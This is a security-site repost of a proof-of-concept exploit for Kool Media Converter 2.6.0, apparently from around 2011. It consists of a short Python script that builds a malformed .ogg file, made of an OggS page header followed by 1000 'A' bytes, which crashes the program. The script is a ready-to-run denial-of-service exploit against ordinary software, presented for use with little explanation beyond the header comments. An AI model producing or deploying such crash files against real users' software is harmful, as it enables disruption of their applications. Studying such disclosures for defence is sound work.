首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Kool Media Converter v2.6.0 DOS
来源:flavio[dot]baldassi[at]gmail[dot]com 作者:swami 发布时间:2011-11-14  

#!/usr/bin/env python
#
#
# Exploit Title: Kool Media Converter v2.6.0 DOS
# Date: 10/10/2011
# Author: swami
# E-Mail: flavio[dot]baldassi[at]gmail[dot]com
# Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe
# Version: 2.6.0
# Tested on: Windows XP SP3 ENG
#
#--- From Vendor Website
# Kool Media Converter is a sound tool addressed to casual listeners and fervent
# audiophiles likewise. It deals with compatibility problems between your audio files
# and the media player you are using to help you enjoy all the songs you love anyway you like.
#
#--- Description
# Kool Media Converter fails to handle a malformed .ogg file

ogg = b'\x4F\x67\x67\x53'  # Capture Pattern OggS in ascii
ogg += b'\x00'    # Version currently 0
ogg += b'\x02'         # Header Type of page that follows
ogg += b'\x00' * 8   # Granule Position
ogg += b'\xCE\xc6\x41\x49'  # Bitstream Serial Number
ogg += b'\x00' * 4    # Page Sequence Number
ogg += b'\x70\x79\xf3\x3d'       # Checksum
ogg += b'\x01'         # Page Segment max 255
ogg += b'\x1e\x01\x76\x6f'  # Segment Table

ogg += b'\x41' * 1000

try:
 f = open('koolPoC.ogg','wb')
 f.write(ogg)
 f.close()
except:
 print('\nError while creating ogg file\n')

 

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS11-083 Denial Of Service
·Support Incident Tracker <= 3.
·Aviosoft Digital TV Player Pro
·Soda PDF Professional 1.2.155
·Wordpress Zingiri Plugin <= 2.
·glibc LD_AUDIT arbitrary DSO l
·Mini-Stream RM-MP3 Converter v
·AbsoluteFTP 1.9.6 - 2.2.10 Rem
·Firefox 8.0 Null Pointer Deref
·AbsoluteFTP 1.9.6 - 2.2.10 Rem
·FairStars Recorder Local Buffe
·Aviosoft Digital TV Player Pro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved